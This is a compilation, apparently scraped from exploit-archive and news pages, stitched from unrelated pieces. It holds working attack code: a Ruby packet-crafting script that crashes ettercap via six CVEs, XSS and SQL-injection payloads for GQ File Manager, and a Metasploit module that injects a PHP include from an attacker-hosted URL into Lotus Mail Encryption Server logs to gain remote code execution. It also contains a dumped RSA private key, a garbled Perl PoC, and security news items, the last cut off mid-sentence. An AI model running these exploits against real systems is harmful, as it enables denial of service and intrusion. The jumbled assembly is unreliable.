discovered in the official iWifi for Chat v1.1 iOS web-application. The vulnerbaility allows remote attackers to shutdown the service application by sending a special crafted chat message. The vulnerability is located in the application message input context. Remote attackers are able to inject special chars to provoke an error that results in a app shutdown. The bug can be exploited by processing to send special crafted symbole messages through the context message input box. The vulnerability allows an attacker to crash the connected remote ios client. The security risk of the denial of service vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.6. Exploitation of the DoS vulnerability requires no privileged application user account but a connected chat user for interaction. Successful exploitation of the code execution vulnerability results in mobile application compromise and affected or connected device component compromise. Vulnerable Module(s): [+] Chat Message Input Box Vulnerable Parameter(s): [+] message context Affected Module(s): [+] iWifi for Chat v1.1 Proof of Concept (PoC): ======================= The Vulnerability can be exploited by remote attackers without user interaction or privileged application user account. For security demonstration or to reporduce the vulnerability follow the provided information and steps below to continue. PoC: 1024 bytes - message context payload ?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????????¬?????????????????-????????????????????????????? ¬??????????????¬??????????????????????????????¬¬?????????????? ???????????????¬? ?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????¬??????? -??????????????????????¬??????? PoC: Exploit #!/usr/local/bin/perl open (MYFILE, '>>exploitcode.txt'); print MYFILE "?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????????¬?????????????????-????????????????????????????? ¬??????????????¬??????????????????????????????¬¬ ?????????????????????????????¬? ?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????¬??????? -??????????????????????¬???????\n"; close (MYFILE); Security Risk: ============== The security risk of the of the denial of service web vulnerability is estimated as medium. (CVSS 4.6) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

#Exploit Title: 6 Remote ettercap Dos exploits to 1 #Date: 19/12/2014 #Exploit Author: Nick Sampanis #Vendor Homepage: http://ettercap.github.io #Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz #Version: 8.0-8.1 #Tested on: Linux #CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379 #Make sure that you have installed packefu and pcaprub require 'packetfu' include PacketFu if ARGV.count < 4 puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface" puts "[-]Use valid mac for your interface, if you dont know"+ " victim's ip address use broadcast" exit end def nbns_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 137 u.payload = "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00" u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name u.payload << "\x00\x20" #type u.payload << "\x00\x01" #class u.payload << "A"*1000 #pad u.recalc u.to_w(ARGV[3]) end def gg_client u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[0] u.ip_daddr = ARGV[1] u.tcp_src = 3333 u.tcp_dst = 8074 u.payload = "\x15\x00\x00\x00" #gg_type u.payload << "\xe8\x03\x00\x00" #gg_len u.payload << "A"*1000 u.recalc u.to_w(ARGV[3]) end def dhcp_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[0] u.ip_saddr = ARGV[1] u.udp_src = 67 u.udp_dst = 4444 u.payload = "\x02"*236 u.payload << "\x63\x82\x53\x63" u.payload << "\x35" u.payload << "\x00\x05\x00" u.payload << "\x51" u.payload << "\x00" #size u.payload << "A" * 3 #pad u.recalc u.to_w(ARGV[3]) end def mdns_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 5353 u.payload = "\x11\x11" #id u.payload << "\x00\x00" #flags u.payload << "\x00\x01" #questions u.payload << "\x00\x00" #answer_rr u.payload << "\x00\x00" #auth_rrs u.payload << "\x00\x00" #additional_rr u.payload << "\x06router\x05local\x00" #name u.payload << "\x00\x01" #type u.payload << "\x00\x01" #class u.recalc u.to_w(ARGV[3]) end def mdns_dos_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 5353 u.payload = "\x11\x11" #id u.payload << "\x00\x00" #flags u.payload << "\x00\x01" #questions u.payload << "\x00\x00" #answer_rr u.payload << "\x00\x00" #auth_rrs u.payload << "\x00\x00" #additional_rr u.payload << "\x01" u.payload << "\x00\x01" #type u.payload << "\x00\x01" #class u.payload << "A"*500 u.recalc u.to_w(ARGV[3]) end def pgsql_server u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[1] u.ip_daddr = ARGV[0] u.tcp_src = 5432 u.tcp_dst = 3333 u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00" u.recalc u.to_w(ARGV[3]) end def pgsql_client u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[0] u.ip_daddr = ARGV[1] u.tcp_src = 3333 u.tcp_dst = 5432 u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00" u.recalc u.to_w(ARGV[3]) end def pgsql_client_shell u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[0] u.ip_daddr = ARGV[1] u.tcp_src = 3333 u.tcp_dst = 5432 u.payload = "\x70" u.payload << "\x00\x00\x03\xe9" #len u.payload << "A"*1000 u.payload << "\x00" u.recalc u.to_w(ARGV[3]) end def radius_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 1645 u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01" u.recalc u.to_w(ARGV[3]) end puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis" puts "[+]-1- nbns plugin CVE-2014-9377" puts "[+]-2- gg dissector CVE-2014-9376" puts "[+]-3- dhcp dissector CVE-2014-9376" puts "[+]-4- mdns plugin CVE-2014-9378" puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)" puts "[+]-6- radius dissector CVE-2014-9379" print "choice:" choice = $stdin.gets.chomp().to_i() case choice when 1 puts "[+]Sending nbns packet.." nbns_header when 2 puts "[+]Sending client gg packet.." gg_client when 3 puts "[+]Sending dhcp packet.." dhcp_header when 4 puts "[+]Sending mdns packet.." mdns_header mdns_dos_header when 5 puts "[+]Sending pgsql packet.." pgsql_client pgsql_server pgsql_client_shell when 6 puts "[+]Sending radius packet.." radius_header else puts "[-]Unrecognized command " end Source

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Exploit Title: GQ File Manager - Sql Injection - Cross Site Scripting Vulnerability's # Date: 19/12/2014 # Url Vendor: http://installatron.com/phpfilemanager # Vendor Name: GQ File Manager # Version: 0.2.5 # CVE: CVE-2014-1137 # Author: TaurusOmar # Tiwtter: @TaurusOmar_ # Email: taurusomar13@gmail.com # Home: overhat.blogspot.com # Tested On: Bugtraq Optimus # Risk: High Description GQ File Manager is a lightweight file manager that enables files to be uploaded to and downloaded from a server directory. GQ File Manager is great for creating and maintaining a simple cloud-based repository of files that can be accessed from anywhere on the Internet. ------------------------ + CROSS SITE SCRIPTING + ------------------------ # Exploiting Description - Created new file example:("xss.html")in the document insert code xss Input: "><img src=x onerror=;;alert('XSS') /> Output: <br /> <b>Warning</b>: fread() [<a href='function.fread'>function.fread</a>]: Length parameter must be greater than 0 in <b>/home/u138790842/public_html/gp/incl/edit.inc.php</b> on line <b>44</b><br /> "><img src=x onerror=alert("xss");> #P0c "><img src=x onerror=;;alert('XSS') /> #Proof Concept http://i.imgur.com/cjIvR5l.jpg ------------------------ + Sql Injection + ------------------------ # Exploiting Description - The Sql Injection in path created a new file. #P0c http://site.com/GQFileManager/index.php?&&output=create&create=[sql] #Proof Concept http://i.imgur.com/IJZoDVt.jpg -----BEGIN RSA PRIVATE KEY----- MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi 2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8 GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/ WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R 8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM 8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/ -----END RSA PRIVATE KEY----- Source

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::PHPInclude def initialize(info = {}) super(update_info(info, 'Name' => 'Lotus Mail Encryption Server (Protector for Mail) Local File Inclusion', 'Description' => %q{ This module exploits a local file inclusion vulnerability in the Lotus Mail Encryption Server (Protector for Mail Encryption) administration setup interface. The index.php file uses an unsafe include() where an unauthenticated remote user may read (traversal) arbitrary file contents. By abusing a second bug within Lotus, we can inject our payload into a known location and call it via the LFI to gain remote code execution. Version 2.1.0.1 Build(88.3.0.1.4323) is known to be vulnerable. You may need to set DATE in the format YYYY-MM-DD to get this working, where the remote host and metasploit instance have UTC timezone differences. }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.osisecurity.com.au/advisories/' ], #0day #[ 'CVE', 'X' ], [ 'OSVDB', '87556'], #[ 'BID', 'X' ], ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Lotus Mail Encryption Server 2.1.0.1', { }]], 'DisclosureDate' => 'Nov 9 2012', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(9000), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new("DATE", [false, 'The date of the target system log file in YYYY-MM-DD format']), ], self.class) end def check res = send_request_cgi( { 'uri' => '/' }) if (res.code == 302 && res.body.match(/GetLoginScreen.uevent/)) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def php_exploit logfile = datastore['DATE'] ? datastore['DATE'] : Time.now.strftime("%Y-%m-%d") if (logfile !~ /\d\d\d\d-\d\d-\d\d/) # if set by user datastore... print_error("DATE is in incorrect format (use 'YYYY-MM-DD'). Unable to continue.") return end # set up the initial log file RCE - this is unescaped ascii so we can execute it # later uid is tomcat so we cannot read apache's logs, and we are stuck inside # tomcat's php-cgi wrapper which prevents /proc/* injection and a lot of the # filesystem. example good injected log: '/var/log/ovid/omf-2012-08-01.log' patrick inject_url = "/omc/GetSetupScreen.event?setupPage=<?php+include+'#{php_include_url}';+?>" # no whitespace res = send_request_cgi( { 'uri' => inject_url }) if (res and res.code == 404 and res.body.match(/Lotus Protector for Mail Encryption - Page Not Found/)) # it returns a 404 but this is good. vprint_good("Payload injected...") response = send_request_cgi( { 'uri' => '/omc/pme/index.php', 'cookie' => "slaLANG=../../../../../../var/log/ovid/omf-#{logfile}.log%00;", # discard .php }) end end end Source

It’s a real bummer when people spend a lot of their money on AAA PC games only to not be able to play them. Major publishers like EA, Activision, and Ubisoft are pushing their own online services, requiring their PC and console games to connect to their servers for any sort of functionality whatsoever. That includes single-player games. Those publishers never seem to have sufficient server capacity to handle the traffic from millions of players executing their games soon after the launch of immensely popular titles. It leads to millions of customers becoming frustrated that they can’t play the games they paid for, many of which were preordered. Developers and publishers say that the “always online” requirement of their new games is to enhance functionality that gamers should appreciate – maybe so, but demanding constant connectivity to their servers is mainly a DRM measure, which is a sloppy way of combating piracy. But that sort of a system penalizes paying consumers a lot more than it inconveniences pirates. My last article focused on that issue. In this article, I’ll explain how poorly designed DRM not only affects gamers, but it also hurts people who legitimately purchase and use applications from two software behemoths: Microsoft and Adobe. Then, I’ll tackle the issue Sony had nearly a decade ago when the DRM on their music CDs was actually vicious rootkit malware. Redmond Goofed The most frequently used components of the Microsoft Office suite have been available for MS-DOS, Windows, and Mac OS since the 1980s. Later on, Microsoft decided to integrate Word, Excel, and PowerPoint into the Microsoft Office suite. The first version for Mac OS debuted in 1989 and for Windows in 1990. A few years later, Word and Excel surpassed competing applications from WordPerfect and Lotus to become the most popular formats for documents and spreadsheets. Microsoft implemented their own special kind of DRM in Office 2003, Information Rights Management. IRM is designed to enable people who create documents in Office programs to protect them from unauthorized changes, and from access from unauthorized parties. As some enterprises using Office applications have proprietary information in the files they create, IRM was developed to appeal to them. It’s a wonderful technology, in theory. Until something goes wrong… The function in Microsoft Office that controls IRM is the Rights Management System. RMS controls the IRM that document creators put on their files from Microsoft’s servers, via certificates. On Friday, December 11th, 2009, people who have authorization to use and access IRM-protected documents, including people working for big corporations, received this error message: “Unexpected error occurred. Please try again later or contact your system administrator.” Of course, contacting one’s system administrator would’ve done no good. Considering that the bug affected everyone with IRM-protected documents in Office 2003, it’s reasonable to estimate that corporations lost millions of dollars from lost productivity. So, what went wrong? What was the bug? It was Microsoft’s fault, and they admitted it. They let one of their own certificates expire. Oops! The following day, Saturday, December 12th, Microsoft released a hotfix to correct the issue. But as many corporate offices are closed on the weekend, sysadmins at each affected corporation had to find and implement the hotfix on Monday. Many big businesses had to wait until the end of Monday or Tuesday to acquire access to their crucial documents again. IRM and RMS functionality is also in later versions of Office. And not only does Microsoft have to make sure that their certificates are current, but also if their servers experience any downtime, many more millions of dollars in lost productivity could affect corporations worldwide. Microsoft launched their Office 365 SaaS (software as a service) in 2011, and renewed it for Office 2013 support in 2013. With their productivity applications hosted off of Microsoft’s servers, server downtime can prevent corporations from creating new documents and editing existing documents. I wouldn’t recommend Office 365 to anyone. I foresee significant, albeit temporary, information security problems in the future. Microsoft Silverlight is Microsoft’s equivalent to Adobe Flash. It was initially released in 2007. Of course, Microsoft’s own Internet Explorer supported it from the get go, and then support was extended to Mozilla Firefox, Google Chrome, and Apple Safari. A very recent Patch Tuesday (which they now call Update Tuesday, for connoted reasons) broke Silverlight. In the immortal words of Britney Spears, oops, they did it again! Update KB3011970 rendered Silverlight completely unusable. A large percentage of web apps use Silverlight, the web version of Netflix being one of many. The bug that KB3011970 introduced pertained to Silverlight’s DRM. The bug was reported on December 11th, 2014. By December 12th, Microsoft rereleased KB3011970, fixing the DRM bug. I detect a pattern here, which is an intriguing coincidence. Problems on December 11th, fixes on December 12th. Hmmm… Mountain View Goofed Google isn’t the only big Silicon Valley corporation based in Mountain View, California. So is Adobe. Adobe is the industry leader in media creation software. They integrated their graphic editing Photoshop, PDF creation Acrobat, video editing After Effects and Premiere Pro, web developing Dreamweaver and Flash Professional, and a number of other applications into their Adobe Creative Suite. Creative Suite 6, released in 2012, was the last version. Its replacement is Adobe Creative Cloud, a SaaS that initially launched in 2011. I suppose you can figure where this is going. On or before May 14th, 2014, Creative Cloud went down. A lot of corporations and businesses depend on the SaaS, many of whom work in Hollywood. Adobe said it was due to a mistake made during a “database maintenance activity.” Ceasing Creative Suite support and shifting to Creative Cloud meant that, like Microsoft with Office 365, Adobe is depending on “always on” connectivity to their servers for the sake of DRM. Editing of Hollywood blockbusters and television shows was halted. Graphic editing for advertising agencies and web developers ceased. Web developers, many of whom were working for the largest corporations, also couldn’t work on their web pages or Flash-based web applications. Software pirates were completely unaffected. So much for the objectives of Digital Rights Management. Just like other stories in this series, DRM implementation was hurting the availability component of the CIA triad of information security. As with Microsoft’s DRM problems, corporations must have lost many millions of dollars due to lost productivity. A full two days later, Adobe tweeted “Adobe ID issue is resolved. We are bringing services back online. We will share more details once we confirm everything is working.” Maybe incidents like that will encourage some corporations to replace Creative Cloud with applications from competing developers. That’s not the only time in 2014 that Adobe’s DRM has caused massive problems for legitimate users. Adobe Digital Editions is ePub and PDF ebook reading software, with significant DRM of its own. Not only is Digital Editions its own desktop ebook reading software, it’s also integrated in Google Play Books, Barnes and Noble Nook ebook readers, and also in ebook readers and tablets from OEMs such as Sony, Acer, HP, and Samsung. Millions of people worldwide use Adobe Digital Editions whether they know it or not, and major publishing houses depend on it to protect their ebook titles. In January 2014, a large number of users experienced problems when Adobe updated their Digital Editions DRM. When legitimate users purchased ebooks on their desktop, they weren’t able to read their books on their ebook reader devices the way they’re supposed to. Once again, here’s another case of DRM hurting people who have purchased products, when pirates were unaffected because there’s no such DRM on most ebooks pirated via BitTorrent and other P2P networks. Argh… Remember When Sony Created Malware? On the subject of information security attacks affecting people who properly purchased media, remember when Sony created malware? Sony, of course, is a major player in the music industry, with their own assortment of record labels. Sony was greatly concerned about users putting music CDs into their PCs, ripping the audio content, and pirating it via P2P. So, they installed DRM on many of their albums in an effort to prevent such piracy. Sony’s XCP DRM is on CDs they released in 2005. Affected titles include Switchfoot’s Nothing Is Sound, Ricky Martin’s Life, Our Lady Peace’s Healthy in Paranoid Times, Neil Diamond’s 12 Songs, Celine Dion’s On Ne Change Pas, Natasha Bedingfield’s Unwritten, and Amerie’s Touch. XCP was actually rootkit spyware malware. Not only did it allow Sony to spy on your activities, it also made millions of PCs more vulnerable from destructive attacks from blackhats. Trying to remove XCP would break Windows at its very core. When it was discovered, Sony’s Thomas Hesse arrogantly said, “Most people don’t even know what a rootkit is, so why should they care about it?” Even worse, Sony’s initial fix created yet another backdoor vulnerability. Within days, Breplibot trojan malware exploited the attack vector XCP created. Oops, once again. In reaction, F-Secure’s Mikko Hypponen said, “Sony rootkit was one of the seminal moments in malware history. Not only did it bring rootkits into public knowledge, it also gave a good lesson to media companies on how not to do their DRM solutions.” Sony and Microsoft eventually fixed the problem, but the cat was out of the bag, and Sony’s image took a major hit. Hopefully they’ve learned their lesson, as has the rest of the music industry. Hopefully… So, in this series, I’ve explained how DRM implementations have created significant problems for corporations and consumers, with a lot of frustration, information security threats, and millions upon millions of dollars lost from our economy — perhaps collective billions from all DRM problems. Instead of hurting pirates, these DRM incidents have hurt paying consumers. In my final article in this series, I’ll talk about developers and services that don’t use DRM at all. Their products should be considered if you want to avoid these sorts of issues from affecting you. References Microsoft DRM locks Office 2003 users out of their own documents- Charles Arthur, The Guardian Microsoft DRM locks Office 2003 users out of their own documents | Technology | The Guardian Microsoft forgets to renew DRM certificate, Office 2003 users suffer- John Brownlee, Geek.com Microsoft forgets to renew DRM certificate, Office 2003 users suffer - Geek Office 2003 Rights Management Bug Locks Up Files- David Worthington, Technologizer Office 2003 Rights Management Bug Locks up Files Cannot Open Office 2003 Documents Protected with RMS- Microsoft TechNet Cannot Open Office 2003 Documents Protected with RMS - Office Updates - Site Home - TechNet Blogs Bug in DRM Gets December Silverlight Patch Pulled- Rod Trent, Windows IT Pro Bug in DRM Gets December Silverlight Patch Pulled | Windows Update content from Windows IT Pro December 2014 update for Microsoft Silverlight 5- Microsoft Support https://support.microsoft.com/kb/3011970 Destructive DRM Strikes Again: Creative Professionals Blocked From Using Adobe Products For Days- Mike Masnick, TechDirt https://www.techdirt.com/articles/20140518/06371227275/destructive-drm-strikes-again-creative-professionals-blocked-using-adobe-products-days.shtml Adobe Creative Cloud outage workaround highlights DRM issues- James Sanders, TechRepublic Adobe Creative Cloud outage workaround highlights DRM issues - TechRepublic Creative Cloud outage leaves Adobe users unable to work- Adam Banks, MacUser Creative Cloud outage leaves Adobe users unable to work | MacUser After nearly 10 years, Adobe abandons its Creative Suite entirely to focus on Creative Cloud- Harrison Weber, TheNextWeb Adobe Abandons Its Creative Suite to Focus on Creative Cloud Can’t Read Your eBooks? Adobe’s New DRM Update Could be the Cause- Nate Hoffelder, The Digital Reader Can't Read Your eBooks? Adobe's New DRM Update Could be the Cause ? The Digital Reader Adobe Digital Editions Supported Devices- Adobe Digital Publishing https://blogs.adobe.com/digitalpublishing/supported-devices Google adopts Adobe eBook DRM- Adobe Digital Publishing https://blogs.adobe.com/digitalpublishing/2010/12/google-ebooks.html Are You Infected By Sony-BMG’s Rootkit?- Fred Von Lohmann, Electronic Frontier Foundation https://www.eff.org/deeplinks/2005/11/are-you-infected-sony-bmgs-rootkit Sony BMG rootkit scandal: 5 years later- Bob Brown, Network World Sony BMG rootkit scandal: 5 years later | Network World Sony rootkit: The untold story- David Berlind, ZDNet Sony rootkit: The untold story | ZDNet Sony’s DRM Rootkit: The Real Story- Bruce Schneier https://www.schneier.com/blog/archives/2005/11/sonys_drm_rootk.html Source

US-CERT released a not-so-cryptic advisory this weekend providing enterprises with indicators of compromise and detailed descriptions of the malware used against “a major entertainment company,” the Department of Homeland Security’s description of Sony Pictures Entertainment. DHS describes in great detail a worm capable of moving its way through Windows Server Message Block network shares, conducting brute-force password attacks against protected network shares before dropping five other components, including destructive disk-crushing wiper malware. The advisory was finalized on Saturday, less than a day after the FBI officially pinned the blame for the attack on North Korea and President Barack Obama, during a year-end news conference, said Sony made a mistake in canceling the Christmas Day premiere of the comedy movie The Interview. “Due to the highly destructive functionality of this malware, an organization infected could experience operational impacts including loss of intellectual property and disruption of critical systems,” the US-CERT advisory said. The worm acts as a dropper, leaving behind according to DHS, a listening implant, a lightweight backdoor, a proxy tool, a destructive hard drive tool, and a destructive target cleaning tool. The worm contains two threads, US-CERT said, the first calls home and sends back log data while the second attempts to guess passwords on new Windows Server Message Block connections. The worm calls home every five minutes with log data, sending it to one of a handful of command and control servers, and seeks out other SMB shares over port 445. If the brute-force attack works, a file share is established and the malware components are dropped and run on the new host. Sony has been under siege since Nov. 24 when employees were greeted with a message on their workstations and threats from a hacker group calling themselves the Guardians of Peace. Since then, Sony has been subjected to numerous data leaks including unreleased movies and scripts made available online, to embarrassing email exchanges between executives, to the personal health care and contact information of employees released to Pastebin. Security researchers in the meantime tied samples of the Destover wiper malware used against Sony to the Shamoon attack against Saudi Aramco and the DarkSeoul attacks against financial institutions and media outlets in South Korea. The links between attacks against Sony and the previous two attacks were solid, said Kaspersky Lab researcher Kurt Baumgartner who noted similarities in the use of the commercially available Eldos RawDisk driver files in the Shamoon and Destover attacks. He also said that wiper drivers are maintained in the dropper’s resource section (in Shamoon and Destover), and disk data and the MBR are overwritten with encoded political messages (Shamoon and DarkSeoul). While Shamoon has been linked to Iran, DarkSeoul was tied to North Korea and it didn’t take long for investigators to make the same connection with Destover, despite doses of skepticism from security experts. The DHS advisory is the first deep dive into the malware components left behind by the dropper, including the two wiper components, one which destroys hard drive data on the first four physical drives it encounters as well as the master boot record with an additional program designed to do additional damage if a machine is rebooted. If a user has only user-level privileges rather than admin-level, the amount of damage is lessened. The advisory also provides insight into the backdoor, which can move files, system information, manipulate processes and also remote and command line code execution. “This tool includes functionality to open ports in a victim host’s firewall and take advantage of universal Plug and Play (UPNP) mechanisms to discover routers and gateway devices, and add port mappings, allowing inbound connections to victim hosts on Network Address Translated (NAT) private networks,” the advisory said. “There are no callback domains associated with this malware since connections are inbound only on a specified port number.” In addition to IOCs, the DHS advisory also contains a list of seven command and control servers located in Thailand, Poland, Italy, Bolivia, Singapore, Cypress and the United States. Source

Critical holes have been reported in the implementation of the network time protocol (NTP) that could allow unsophisticated attackers root access on servers. System administrators may need to forego the Christmas beers and roasted beasts until they've updated NTP daemons running versions 4.2.8 and below. The grinch bug was announced by the US Industrial Control Systems Emergency Response Team, which received news of the hole from Google security researchers. "Exploitation of these vulnerabilities could allow an attacker to execute arbitrary code with the privileges of the ntpd process," the agency said in an advisory. "An attacker with a low skill would be able to exploit these vulnerabilities. "Exploits that target these vulnerabilities are publicly available." Google's Neel Mehta and Stephen Roettger reported two serious and four "less-serious" bugs which were patched in 4.2.8 released 18 December. These included weak default keys, weak random number generator seeds, and buffer overflows. Admins should backup operational industrial control system configurations and test the patch prior to deployment, the computer emergency response team urged. It's also advisable to harden systems by minimising network exposure, including by shoving remote devices and - where applicable - control system networks behind firewalls and into isolated zones. Source

A blast furnace at a German steel mill suffered "massive damage" following a cyber attack on the plant's network, says a report. Details of the incident emerged in the annual report of the German Federal Office for Information Security (BSI). It said attackers used booby-trapped emails to steal logins that gave them access to the mill's control systems. This led to parts of the plant failing and meant a blast furnace could not be shut down as normal. The unscheduled shutdown of the furnace caused the damage, said the report. In its report, BSI said the attackers were very skilled and used both targeted emails and social engineering techniques to infiltrate the plant. In particular, said BSI, the attackers used a "spear phishing" campaign aimed at particular individuals in the company to trick people into opening messages that sought and grabbed login names and passwords. The phishing helped the hackers extract information they used to gain access to the plant's office network and then its production systems. Once inside the steel mill's network, the "technical capabilities" of the attackers were evident, said the BSI report, as they showed familiarity with both 